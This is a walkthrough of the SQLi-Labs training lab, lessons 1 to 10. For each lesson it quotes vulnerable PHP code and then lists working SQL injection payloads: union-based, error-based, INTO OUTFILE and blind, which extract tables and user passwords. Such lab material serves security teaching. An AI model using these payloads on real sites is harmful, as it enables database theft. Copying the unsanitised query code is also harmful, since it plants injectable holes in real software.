SQLi-Labs Less 1-10
Less-1 GET - Error based - Single Quotes - String 报错注入
Code:
if(isset($_GET['id']))
{
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
if($row)
{
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}
else
{
print_r(mysql_error());
Code:
' or 1=1 --+
' and 1=2 union select 1,user(),database() --+
' and 1=2 union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 LIMIT 3,1 --+
' and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 1,1 --+
' and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 2,1 --+
' and 1=2 union select 1,username,password from security.users LIMIT 0,1 --+
Less-2 GET - Error based - Intiger based
Code:
if(isset($_GET['id']))
{
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
if($row)
{
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}
else
{
print_r(mysql_error());
Code:
1 or 1=1 --+
1 and 1=2 union select 1,user(),database() --+
1 and 1=2 union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 LIMIT 3,1 --+
1 and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 1,1 --+
1 and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 2,1 --+
1 and 1=2 union select 1,username,password from security.users LIMIT 0,1 --+
Less-3 GET - Error based - Single Quotes with twist - String
Code:
if(isset($_GET['id']))
{
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
if($row)
{
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}
else
{
print_r(mysql_error());
Code:
') or 1=1 --+
') and 1=2 union select 1,user(),database() --+
') and 1=2 union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 LIMIT 3,1 --+
') and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 1,1 --+
') and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 2,1 --+
') and 1=2 union select 1,username,password from security.users LIMIT 0,1 --+
Less-4 GET - Error based - Double Quotes - String
Code:
if(isset($_GET['id']))
{
$id=$_GET['id'];
$id = '"' . $id . '"';
$sql=" SELECT * FROM users WHERE id=($id) LIMIT 0,1";
if($row)
{
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}
else
{
print_r(mysql_error());
Code:
") or 1=1 --+
") and 1=2 union select 1,user(),database() --+
") and 1=2 union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 LIMIT 3,1 --+
") and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 1,1 --+
") and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 2,1 --+
") and 1=2 union select 1,username,password from security.users LIMIT 0,1 --+
Less-5 GET - Double injection - Single Quotes - String 利用报错回显
双注入语句:union select 1 from (select+count(*),concat(floor(rand(0)*2),(注入语句))a from information_schema.tables group by a)b
Code:
if(isset($_GET['id']))
{
$id=$_GET['id'];
$sql=" SELECT * FROM users WHERE id='$id' LIMIT 0,1";
if($row)
{
echo 'You are in...........';
}
else
{
print_r(mysql_error());
Code:
' or 1=1 --+
' union select 1 from (select count(*),concat(floor(rand()*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b --+
' union select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4))a from information_schema.tables group by a)b --+
' union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b --+
' union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b --+
' union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b --+
Less-6 GET - Double injection - Double Quotes - String
Code:
if(isset($_GET['id']))
{
$id=$_GET['id'];
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
if($row)
{
echo 'You are in...........';
}
else
{
print_r(mysql_error());
Code:
" or 1=1 --+
" union select 1 from (select count(*),concat(floor(rand()*2),(select concat(version(),0x22, user(),0x22,database())))a from information_schema.tables group by a)b --+
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4))a from information_schema.tables group by a)b --+
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b --+
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b --+
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b --+
Less-7 GET - Dump into outfile - String 利用文件转储 into outfile
Code:
if(isset($_GET['id']))
{
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
if($row)
{
echo 'You are in.... Use outfile......';
}
else
{
echo 'You have an error in your SQL syntax';
//print_r(mysql_error());
Code:
')) or 1=1 --+
')) and 1=2 union select 1,2,TABLE_NAME into outfile '/var/www/tables.txt' from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 --+
')) and 1=2 union select 1,2,COLUMN_NAME into outfile '/var/www/column.txt' from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 --+
')) and 1=2 union select 1,username,password into outfile+'/var/www/data.txt' from security.users --+
Less-8 GET - Blind - Boolian Based - Single Quotes
Code:
if(isset($_GET['id']))
{
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
if($row)
{
echo 'You are in...........';
}
else
{
//echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
Code:
1' or 1=1 --+
1' and ascii(substr(database(),1,1))=115 --+
1' and (ascii(substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4),1,1))) = 117 --+
1' and (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1 ),1,1))) = 117 --+
1' and (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1 ),1,1))) = 112 --+
1' and (ascii(substr((select username from users limit 0,1),1,1))) = 68 --+
1' and (ascii(substr((select password from users limit 0,1),1,1))) = 68 --+
Less-9 GET - Blind - Time Based - Single Quotes
Code:
if(isset($_GET['id']))
{
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
if($row)
{
echo 'You are in...........';
}
else
{
echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
Code:
1' and if(ascii(substr(database(),1,1))=115,sleep(5),1) --+
1' and if((ascii(substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4),1,1))) = 117 ,sleep(5),1) --+
1' and if((ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1 ),1,1))) = 117 ,sleep(5),1) --+
1' and if((ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1 ),1,1))) = 112 ,sleep(5),1) --+
1' and if((ascii(substr((select username from users limit 0,1),1,1))) = 68 ,sleep(5),1) --+
1' and if((ascii(substr((select password from users limit 0,1),1,1))) = 68 ,sleep(5),1) --+
Less-10 GET - Blind - Time Based - Double Quotes
Code:
if(isset($_GET['id']))
{
$id=$_GET['id'];
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
if($row)
{
echo 'You are in...........';
}
else
{
echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
Code:
1" and if(ascii(substr(database(),1,1))=115,sleep(5),1) --+
1" and if((ascii(substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4),1,1))) = 117 ,sleep(5),1) --+
1" and if((ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1 ),1,1))) = 117 ,sleep(5),1) --+
1" and if((ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1 ),1,1))) = 112 ,sleep(5),1) --+
1" and if((ascii(substr((select username from users limit 0,1),1,1))) = 68 ,sleep(5),1) --+
1" and if((ascii(substr((select password from users limit 0,1),1,1))) = 68 ,sleep(5),1) --+